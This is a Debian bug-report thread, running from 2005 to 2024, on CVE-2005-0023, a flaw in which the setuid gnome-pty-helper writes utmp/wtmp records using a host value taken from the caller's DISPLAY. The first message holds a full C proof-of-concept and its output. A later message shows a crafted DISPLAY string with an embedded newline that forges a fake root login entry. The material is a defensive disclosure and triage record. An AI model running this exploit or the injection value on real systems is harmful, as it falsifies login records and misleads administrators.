Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
New Bug report received and forwarded. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Tue, 20 Sep 2005 09:01:20 +1000
Package: libzvt2
Version: 1.4.2-19
Severity: critical
File: /usr/sbin/gnome-pty-helper
Justification: root security hole
gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
DISPLAY (host) settings. I am not sure if it can be tricked into erasing
existing records.
Demo output, code below.
Cheers,
Paul Szabo psz@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
OUTPUT:
psz@savona:~$ gnome-pty-helper-exploit xyz & sleep 1; who; ps aux | grep psz; sleep 6; who
[1] 31444
Writing utmp (who) record for DISPLAY=xyz
Running who | grep xyz
psz pts/2 Sep 20 08:40 (xyz)
utmp (who) record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 31446
Sleeping for 5 secs...
psz pts/2 Sep 20 08:40 (xyz)
psz pts/1 Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
psz 31358 0.0 0.3 10340 7768 ? S 08:14 0:00 xterm -T psz@savona -n psz@savona -sb -sl 10000 -ls
psz 31444 0.0 0.0 1484 380 pts/1 S 08:21 0:00 gnome-pty-helper-exploit xyz
psz 31446 0.0 0.0 1696 604 pts/1 S 08:21 0:00 gnome-pty-helper
psz 31454 0.0 0.0 2496 848 pts/1 R+ 08:21 0:00 ps aux
[1]+ Done gnome-pty-helper-exploit xyz
psz pts/1 Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)
CODE:
/*
Must be compiled against (within)
gnome-libs-1.4.2/zvt
because it uses *.h files from there.
Code "stolen" from subshell.c .
*/
#include <sys/types.h>
#include "subshell-includes.h"
/*
 * Bit flags combined into the update_wutmp argument of get_ptys() to select
 * which login databases the helper is asked to update.  They are defined
 * locally here; the replacement lists are kept as bare literals so that an
 * identical definition in an included header would not clash.
 */
#define ZVT_TERM_DO_UTMP_LOG 1
#define ZVT_TERM_DO_WTMP_LOG 2
#define ZVT_TERM_DO_LASTLOG 4
/*
 * Pid of the helper SUID process.
 * As used by get_ptys(): 0 means no helper has been started yet,
 * -1 means fork() failed and every later request is refused.
 */
static pid_t helper_pid;
/* The socketpair used for the protocol: [0] stays in this process, [1] becomes the helper's stdin */
int helper_socket_protocol [2];
/* The parallel socketpair used to transfer file descriptors: [0] stays here, [1] becomes the helper's stdout */
int helper_socket_fdpassing [2];
#include <sys/socket.h>
#include <sys/uio.h>
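/* Ancillary-data buffer used by receive_fd(); allocated there on first use and then reused. */
static struct cmsghdr *cmptr;
/*
 * Bytes needed for one control message header plus a single int (one
 * descriptor).  Parenthesized so the macro expands safely inside larger
 * expressions such as `2 * CONTROLLEN`.
 * NOTE(review): CMSG_SPACE (sizeof (int)) is the portable way to size such
 * a buffer; the original arithmetic is kept so the value does not change.
 */
#define CONTROLLEN (sizeof (struct cmsghdr) + sizeof (int))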
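/*
 * Receive one file descriptor passed over HELPER_FD as ancillary data.
 *
 * Returns the received descriptor, or -1 if the buffer cannot be
 * allocated, recvmsg() fails or reports end-of-stream, or the message does
 * not carry exactly one SCM_RIGHTS descriptor.
 *
 * The control buffer (cmptr) is allocated once and reused across calls, so
 * without the header check below a message that arrives with no ancillary
 * data would make this function return whatever the buffer held before
 * (uninitialized heap memory on the first call, a stale descriptor number
 * afterwards).
 */
static int
receive_fd (int helper_fd)
{
    struct iovec iov [1];
    struct msghdr msg = {0};   /* also clears msg_flags and any padding */
    struct cmsghdr *cmsg;
    char buf [32];

    /* A small payload buffer is required; the data bytes themselves are ignored. */
    iov [0].iov_base = buf;
    iov [0].iov_len = sizeof (buf);
    msg.msg_iov = iov;
    msg.msg_iovlen = 1;
    msg.msg_name = NULL;
    msg.msg_namelen = 0;

    if (cmptr == NULL && (cmptr = malloc (CONTROLLEN)) == NULL)
        return -1;
    msg.msg_control = cmptr;
    msg.msg_controllen = CONTROLLEN;

    if (recvmsg (helper_fd, &msg, 0) <= 0)
        return -1;

    /*
     * Trust the payload only if the kernel actually delivered a control
     * message of the expected kind and size.
     */
    cmsg = CMSG_FIRSTHDR (&msg);
    if (cmsg == NULL
        || cmsg->cmsg_level != SOL_SOCKET
        || cmsg->cmsg_type != SCM_RIGHTS
        || cmsg->cmsg_len != CMSG_LEN (sizeof (int)))
        return -1;

    return *(int *) CMSG_DATA (cmsg);
}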
/*
 * Fill FD with a connected pair of AF_UNIX stream sockets.
 * Returns whatever socketpair() returns: 0 on success, -1 on error.
 */
static int
s_pipe (int fd [2])
{
    int status;

    status = socketpair (AF_UNIX, SOCK_STREAM, 0, fd);
    return status;
}
/*
 * Ask /usr/sbin/gnome-pty-helper for a pty pair, starting the helper on
 * first use.
 *
 * master, slave: out-parameters that receive the two descriptors passed
 *                back by the helper (first message -> *master, second ->
 *                *slave).
 * update_wutmp:  bitmask of ZVT_TERM_DO_* flags, translated below into the
 *                GnomePtyOps request code written to the helper.
 *
 * Returns the opaque tag read back from the helper, or NULL on any failure
 * (helper not startable, protocol read/write error, or a zero result).
 *
 * Security note: the helper is exec'd with this process's environment
 * unchanged.  Per the bug report, the helper takes the utmp host field from
 * DISPLAY, so whatever the caller put there is what gets recorded.
 */
static void *
get_ptys (int *master, int *slave, int update_wutmp)
{
    GnomePtyOps op;
    int result, n;
    void *tag;
    /* -1 is set below when fork() fails; from then on every call is refused. */
    if (helper_pid == -1)
        return NULL;
    /* 0 means no helper is running yet: create both channels and spawn it. */
    if (helper_pid == 0){
        if (s_pipe (helper_socket_protocol) == -1)
            return NULL;
        if (s_pipe (helper_socket_fdpassing) == -1){
            close (helper_socket_protocol [0]);
            close (helper_socket_protocol [1]);
            return NULL;
        }
        helper_pid = fork ();
        if (helper_pid == -1){
            close (helper_socket_protocol [0]);
            close (helper_socket_protocol [1]);
            close (helper_socket_fdpassing [0]);
            close (helper_socket_fdpassing [1]);
            return NULL;
        }
        if (helper_pid == 0){
            /* Child: stdin becomes the protocol socket, stdout the fd-passing socket. */
            close (0);
            close (1);
            dup2 (helper_socket_protocol [1], 0);
            dup2 (helper_socket_fdpassing [1], 1);
            /* Close aliases */
            close (helper_socket_protocol [0]);
            close (helper_socket_protocol [1]);
            close (helper_socket_fdpassing [0]);
            close (helper_socket_fdpassing [1]);
            /* execl() keeps the current environment, including DISPLAY. */
            execl ("/usr/sbin/gnome-pty-helper", "gnome-pty-helper", NULL);
            /* Only reached if the exec itself failed. */
            exit (1);
        } else {
            /* Parent: drop the helper's ends, keep index 0 of each pair. */
            close (helper_socket_fdpassing [1]);
            close (helper_socket_protocol [1]);
            /*
             * Set the close-on-exec flag for the other
             * descriptors, these should never propagate
             * (otherwise gnome-pty-helper won't notice when
             * this process is killed).
             */
            fcntl (helper_socket_protocol [0], F_SETFD, FD_CLOEXEC);
            fcntl (helper_socket_fdpassing [0], F_SETFD, FD_CLOEXEC);
        }
    }
    /* Map the ZVT_TERM_DO_* bitmask onto a single request code. */
    op = GNOME_PTY_OPEN_NO_DB_UPDATE;
    /*
     * NOTE(review): `update_wutmp & (WTMP | LASTLOG)` is true when EITHER
     * bit is set, so in the UTMP branch the two `else if` arms
     * (..._UWTMP, ..._LASTLOGUTMP) can never be reached, and in the WTMP
     * branch the inner test is always true, leaving ..._PTY_WTMP
     * unreachable.  Presumably the intent was "both bits set" -- confirm
     * against the GnomePtyOps definition before changing the mapping.
     */
    if (update_wutmp & ZVT_TERM_DO_UTMP_LOG){
        if (update_wutmp & (ZVT_TERM_DO_WTMP_LOG | ZVT_TERM_DO_LASTLOG))
            op = GNOME_PTY_OPEN_PTY_LASTLOGUWTMP;
        else if (update_wutmp & ZVT_TERM_DO_WTMP_LOG)
            op = GNOME_PTY_OPEN_PTY_UWTMP;
        else if (update_wutmp & ZVT_TERM_DO_LASTLOG)
            op = GNOME_PTY_OPEN_PTY_LASTLOGUTMP;
        else
            op = GNOME_PTY_OPEN_PTY_UTMP;
    } else if (update_wutmp & ZVT_TERM_DO_WTMP_LOG) {
        if (update_wutmp & (ZVT_TERM_DO_WTMP_LOG | ZVT_TERM_DO_LASTLOG))
            op = GNOME_PTY_OPEN_PTY_LASTLOGWTMP;
        else if (update_wutmp & ZVT_TERM_DO_WTMP_LOG)
            op = GNOME_PTY_OPEN_PTY_WTMP;
    } else
        if (update_wutmp & ZVT_TERM_DO_LASTLOG)
            op = GNOME_PTY_OPEN_PTY_LASTLOG;
    /* Send the request.  Only an error return is caught; a short write is not. */
    if (write (helper_socket_protocol [0], &op, sizeof (op)) < 0)
        return NULL;
    /*
     * Read the helper's status word.  On a failed or short read helper_pid
     * is reset to 0 so the next call spawns a fresh helper; the sockets
     * still held in helper_socket_* are not closed on this path.
     */
    n = read (helper_socket_protocol [0], &result, sizeof (result));
    if (n == -1 || n != sizeof (result)){
        helper_pid = 0;
        return NULL;
    }
    /* A zero result is treated as a refusal (presumably the helper's failure code). */
    if (result == 0)
        return NULL;
    /* The tag is a pointer-sized value chosen by the helper; it is returned as-is and never dereferenced here. */
    n = read (helper_socket_protocol [0], &tag, sizeof (tag));
    if (n == -1 || n != sizeof (tag)){
        helper_pid = 0;
        return NULL;
    }
    /* NOTE(review): receive_fd() returns -1 on failure; neither result is checked before being handed to the caller. */
    *master = receive_fd (helper_socket_fdpassing [0]);
    *slave = receive_fd (helper_socket_fdpassing [0]);
    return tag;
}
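/*
 * Demonstration driver from the bug report.
 *
 * Takes one argument, exports it as DISPLAY, asks gnome-pty-helper (through
 * get_ptys) for a pty with utmp logging, and then runs `who` so the reporter
 * can show that the helper recorded the caller-supplied string as the host
 * field.  The helper removes the record when this process exits.
 *
 * Returns 0 after the demonstration ran, 1 on a usage or setup error.
 */
int main (int argc, char* argv[])
{
    int slave_pty, master_pty;
    void* mytag;
    int log = ZVT_TERM_DO_UTMP_LOG;
    char buf[1000];
    int len;

    /* The original dereferenced argv[1] unconditionally. */
    if (argc < 2 || argv[1] == NULL) {
        fprintf(stderr, "usage: %s DISPLAY\n",
                (argc > 0 && argv[0] != NULL) ? argv[0] : "gnome-pty-helper-exploit");
        return 1;
    }

    printf("Writing utmp (who) record for DISPLAY=%s\n", argv[1]);
    if (setenv("DISPLAY",argv[1],1) != 0) {
        perror("setenv");
        return 1;
    }

    /* The original used a bare `return;` here, leaving the exit status undefined. */
    if ((mytag = get_ptys (&master_pty, &slave_pty, log)) == NULL)
        return 1;

    /*
     * Bounded formatting: the original sprintf() overflowed buf for
     * arguments longer than the buffer.
     *
     * NOTE(review): argv[1] is pasted unquoted into a shell command, so any
     * shell metacharacters in it are interpreted by the shell with the
     * invoking user's own privileges.  Kept because the report's output
     * relies on it; listing utmp entries directly would avoid the shell.
     */
    len = snprintf(buf, sizeof buf, "who | grep %s", argv[1]);
    if (len < 0 || (size_t) len >= sizeof buf) {
        fprintf(stderr, "argument too long, skipping the who check\n");
    } else {
        printf("Running %s\n",buf);
        system(buf);
    }

    printf("utmp (who) record will be cleaned up when we exit.\n");
    printf("To leave it behind, kill gnome-pty-helper: kill %d\n", (int) helper_pid);
    printf("Sleeping for 5 secs...\n");
    sleep (5);
    return 0;
}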
-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.8-spm0.5
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Versions of packages libzvt2 depends on:
ii gdk-imlib1 1.9.14-16.2 imaging library for use with gtk (
ii libc6 2.3.2.ds1-22 GNU C Library: Shared libraries an
ii libglib1.2 1.2.10-9 The GLib library of C routines
ii libgtk1.2 1.2.10-17 The GIMP Toolkit set of widgets fo
ii libx11-6 4.3.0.dfsg.1-14 X Window System protocol client li
ii xlibs 4.3.0.dfsg.1-14 X Keyboard Extension (XKB) configu
ii zlib1g 1:1.2.2-4.sarge.2 compression library - runtime
-- no debconf information
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
Acknowledgement sent to Steve Langasek <vorlon@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
On Tue, Sep 20, 2005 at 09:01:20AM +1000, Paul Szabo wrote:
> Package: libzvt2
> Version: 1.4.2-19
> Severity: critical
> File: /usr/sbin/gnome-pty-helper
> Justification: root security hole
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.
Why is this filed at severity: critical? What is the attack vector here
which permits root privilege escalation?
--
Steve Langasek Give me a lever long enough and a Free OS
Debian Developer to set it on, and I can move the world.
vorlon@debian.org http://www.debian.org/
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Tue, 20 Sep 2005 11:05:10 +1000
Steve,
>> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
>> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
>> existing records.
>
> Why is this filed at severity: critical? What is the attack vector here
> which permits root privilege escalation?
I do not know any root escalation methods. When using reportbug, those
options seemed to fit best, apologies if they were not; please change if
appropriate. (For future reference: which options should I have used
instead?)
(In fact cannot think of any attacks: cannot think of any "important" uses
of utmp/wtmp files. I use utmp in some of my own scripts, that is how I
looked at gnome-pty-helper.)
Cheers, Paul
Paul Szabo psz@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
Acknowledgement sent to Steve Langasek <vorlon@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
On Tue, Sep 20, 2005 at 11:05:10AM +1000, Paul Szabo wrote:
> >> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> >> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> >> existing records.
> > Why is this filed at severity: critical? What is the attack vector here
> > which permits root privilege escalation?
> I do not know any root escalation methods. When using reportbug, those
> options seemed to fit best, apologies if they were not; please change if
> appropriate. (For future reference: which options should I have used
> instead?)
Hmm... After rereading the definition at
<http://www.debian.org/Bugs/Developer#severities>, I guess there's no reason
for this bug to not fall under the description of 'critical', since the
security hole is present just from the installation of the package.
Cheers,
--
Steve Langasek Give me a lever long enough and a Free OS
Debian Developer to set it on, and I can move the world.
vorlon@debian.org http://www.debian.org/
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
Acknowledgement sent to Loïc Minier <lool@dooz.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
To: Paul Szabo <psz@maths.usyd.edu.au>, 329156@bugs.debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 26 Sep 2005 10:37:48 +0200
Hi,
On Tue, Sep 20, 2005, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.
Thanks for your report.
Do you have a CVE ID for this security issue?
Did you check whether libvte4 is affected?
Do you have a fix?
Thanks,
--
Loïc Minier <lool@dooz.org>
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 26 Sep 2005 22:12:45 +1000
Dear Loic,
> Do you have a CVE ID for this security issue?
No. Sorry, I do not know how to get one. (Nor am sure if this is serious
enough to deserve one.)
> Did you check whether libvte4 is affected?
No. Do not know what libvte4 is.
> Do you have a fix?
No. (Fanciful idea: try running xhost, if it fails then surely you do not
"own" that display. Slow, maybe secure. That is what I use now.)
Cheers,
Paul Szabo psz@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
Acknowledgement sent to Loïc Minier <lool@dooz.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 26 Sep 2005 14:18:19 +0200
On Mon, Sep 26, 2005, Paul Szabo wrote:
> No. Sorry, I do not know how to get one. (Nor am sure if this is serious
> enough to deserve one.)
Then I'll see whether it deserves one, and attempt to request one.
> > Did you check whether libvte4 is affected?
> No. Do not know what libvte4 is.
libvte4 is the GNOME 2 equivalent of libzvt2, you can grab it from:
<http://packages.debian.org/>
the source package for this library is "vte".
It'd be nice if you could check whether the gnome-pty-helper shipped in
libvte4 is affected too. Let me know if you don't have a setup
permitting the check, or if you lack the time.
Bye,
--
Loïc Minier <lool@dooz.org>
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 26 Sep 2005 22:43:32 +1000
Dear Loic,
>> > Did you check whether libvte4 is affected?
>> No. Do not know what libvte4 is.
>
> libvte4 is the GNOME 2 zquivalent of libzvt2 ...
> I'd be nice if you could check whether the gnome-pty-helper shipped in
> libvte4 is affected too. Let me know if you don't have a setup
> permitting the check, or if you lack the time.
Looking at the source
vte-0.11.15/gnome-pty-helper/gnome-pty-helper.c
in line 682 it grabs
display_name = getenv ("DISPLAY");
and uses it without any sanity checks: yes, surely it is also affected.
Cheers,
Paul Szabo psz@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
Acknowledgement sent to Matt Zimmerman <mdz@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
retitle 329156 [CAN-2005-0023] /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
thanks
Use CAN-2005-0023 for this issue.
--
- mdz
Changed Bug title.
Request was from Matt Zimmerman <mdz@debian.org>
to control@bugs.debian.org.
Tags added: help
Request was from Thomas Bushnell BSG <tb@becket.net>
to control@bugs.debian.org.
Tags added: security
Request was from Moritz Muehlenhoff <muehlenhoff@univention.de>
to control@bugs.debian.org.
Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#329156; Package libzvt2.
Acknowledgement sent to Loïc Minier <lool@dooz.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
To: Paul Szabo <psz@maths.usyd.edu.au>, 329156@bugs.debian.org,
control@bugs.debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Fri, 30 Sep 2005 13:57:58 +0200
tags 329156 + upstream security
forwarded 329156 http://bugzilla.gnome.org/show_bug.cgi?id=317312
clone 329156 -1
reassign -1 libvte4
thanks
[ THIS IS A RESEND, PREVIOUS MAIL WAS LOST. ]
Hi,
On Tue, Sep 20, 2005, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.
This vulnerability is identified as CAN-2005-0023. The upstream
developers of vte have been notified of the bug at:
<http://bugzilla.gnome.org/show_bug.cgi?id=317312>
Bye,
--
Loïc Minier <lool@dooz.org>
Tags added: upstream, security
Request was from Loïc Minier <lool@dooz.org>
to control@bugs.debian.org.
Bug 329156 cloned as bug 330907.
Request was from Loïc Minier <lool@dooz.org>
to control@bugs.debian.org.
Bug reassigned from package `libzvt2' to `libvte4'.
Request was from Loïc Minier <lool@dooz.org>
to control@bugs.debian.org.
Information forwarded to debian-bugs-dist@lists.debian.org, Arnaud Patard <arnaud.patard@rtp-net.org>: Bug#330907; Package libvte4.
Acknowledgement sent to Loïc Minier <lool@dooz.org>:
Extra info received and forwarded to list. Copy sent to Arnaud Patard <arnaud.patard@rtp-net.org>.
To: 330907@bugs.debian.org, control@bugs.debian.org
Subject: Re: gnome-pty-helper foo
Date: Sat, 8 Oct 2005 20:35:21 +0200
# downgrading the clone too
severity 330907 normal
thanks
On ven, oct 07, 2005, Martin Schulze wrote:
> severity 329156 normal
> thanks dude
>
> Loïc Minier wrote:
> > Hi,
> >
> > On Fri, Oct 07, 2005, Martin Schulze wrote:
> > > Could somebody explain the security implication for me?
> >
> > You can record in the utmp/wtmp logs something which is wrong, for
> > example that an user is currently connected to a display while he
> > isn't. I'm not the one to argue with though.
>
> Ok, so unless somebody proves us wrong we don't consider this a
> security problem.
>
> Regards,
>
> Joey
>
> --
> Everybody talks about it, but nobody does anything about it! -- Mark Twain
>
> Please always Cc to me when replying to me on the lists.
>
--
Loïc Minier <lool@dooz.org>
Severity set to `normal'.
Request was from Loïc Minier <lool@dooz.org>
to control@bugs.debian.org.
Information forwarded to debian-bugs-dist@lists.debian.org, Arnaud Patard <arnaud.patard@rtp-net.org>: Bug#330907; Package libvte4.
Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Arnaud Patard <arnaud.patard@rtp-net.org>.
To: 329156@bugs.debian.org, 330907@bugs.debian.org
Subject: Re: gnome-pty-helper foo
Date: Wed, 12 Oct 2005 12:21:18 +1000
I have not yet found any uses for utmp/wtmp: maybe Joey is right and there
is no security issue. I would then suggest that to increase security,
setuid/setgid bits be removed from all utmp/wtmp maintainers.
In the meantime, I hope that conscientious sysadmins do look at who and
last output occasionally; and expect that
psz@savona:~$ exploit "$(perl -e 'print "XX)\nroot tty01 Jan 01 02:03 (insecure.com"')" & sleep 1; who; sleep 6
[1] 22149
Writing utmp (who) record ...
utmp record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 22152
Sleeping for 5 secs...
psz pts/2 Oct 12 12:16 (XX)
root tty01 Jan 01 02:03 (insecure.com)
psz pts/1 Oct 12 11:37 (y622.yt.maths.usyd.edu.au:0.0)
[1]+ Done exploit "$(perl -e 'print "XX)\nroot tty01 Jan 01 02:03 (insecure.com"')"
psz@savona:~$
should suitably freak them out.
Cheers,
Paul Szabo psz@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
Information forwarded
to debian-bugs-dist@lists.debian.org, gpastore@debian.org (Guilherme de S. Pastore): Bug#330907; Package libvte4.
(Tue, 30 Dec 2008 08:00:03 GMT) (full text, mbox, link).
Acknowledgement sent
to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to gpastore@debian.org (Guilherme de S. Pastore).
(Tue, 30 Dec 2008 08:00:03 GMT) (full text, mbox, link).
To: 329156@bugs.debian.org, 330907@bugs.debian.org
Subject: Re: gnome-pty-helper foo
Date: Tue, 30 Dec 2008 18:58:50 +1100
On 12 Oct 2005 (a long time ago!) I wrote:
> I have not yet found any uses for utmp/wtmp ...
I found a (wrongful) use for it recently, /bin/login relies on ut_line
and chowns that to the user, see
http://bugs.debian.org/505271
That is "not this bug", as this allows us to fake ut_host only...
Cheers,
Paul Szabo psz@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
Bug reassigned from package `libvte4' to `vte'.
Request was from Marco Rodrigues <gothicx@sapo.pt>
to control@bugs.debian.org.
(Sat, 21 Mar 2009 15:12:06 GMT) (full text, mbox, link).
Information forwarded
to debian-bugs-dist@lists.debian.org, gpastore@debian.org (Guilherme de S. Pastore): Bug#330907; Package vte.
(Sat, 21 Mar 2009 22:09:02 GMT) (full text, mbox, link).
Acknowledgement sent
to Marco Rodrigues <gothicx@sapo.pt>:
Extra info received and forwarded to list. Copy sent to gpastore@debian.org (Guilherme de S. Pastore).
(Sat, 21 Mar 2009 22:09:02 GMT) (full text, mbox, link).
To: 330907@bugs.debian.org, 144904@bugs.debian.org, 276575@bugs.debian.org,
143604@bugs.debian.org, control@bugs.debian.org,
vte@packages.debian.org
Subject: Reassigning bugs from libvte4 to vte
Date: Sat, 21 Mar 2009 15:11:01 GMT
reassign 330907 vte
reassign 144904 vte
reassign 276575 vte
reassign 143604 vte
thanks
The libvte4 package has been removed from Debian. We are reassigning
its bugs to the vte package. Please have a look at them,
and close them if they don't apply to vte anymore.
Don't hesitate to reply to this mail if you have any question.
Kind regards,
--
Marco Rodrigues
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#330907; Package vte.
(Thu, 04 Oct 2012 02:27:05 GMT) (full text, mbox, link).
Acknowledgement sent
to paul.szabo@sydney.edu.au:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
(Thu, 04 Oct 2012 02:27:05 GMT) (full text, mbox, link).
Added tag(s) fixed-upstream.
Request was from bts-link-upstream@lists.alioth.debian.org
to control@bugs.debian.org.
(Mon, 11 May 2015 16:54:17 GMT) (full text, mbox, link).
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>: Bug#330907; Package vte.
(Wed, 23 Nov 2016 21:36:06 GMT) (full text, mbox, link).
Acknowledgement sent
to Egmont Koblinger <egmont@gmail.com>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>.
(Wed, 23 Nov 2016 21:36:06 GMT) (full text, mbox, link).
Subject: Re: Bug#330907: gnome-pty-helper: writes arbitrary utmp records
Date: Thu, 19 Sep 2024 19:08:00 +0100
Version: 1:0.28.2-6
On Tue, 20 Sep 2005 at 09:01:20 +1000, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records
Since 2019 (before Debian 11), the vte source package in Debian no longer
installs gnome-pty-helper, so any remaining bugs in gnome-pty-helper
are no longer relevant to its security posture.
For all purposes except the GTK2-based Debian installer, vte has been
replaced by the GTK3/GTK4-based vte2.91, but that package also stopped
providing gnome-pty-helper in 2015 (version 0.42.0-1).
libzvt was also removed from Debian, back in 2008.
So there is no longer a gnome-pty-helper in any supported branch of
Debian, in any descendant of the libzvt package in which CVE-2005-0023
was originally reported, and I'm closing this bug now.
smcv
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Fri, 18 Oct 2024 07:24:33 GMT) (full text, mbox, link).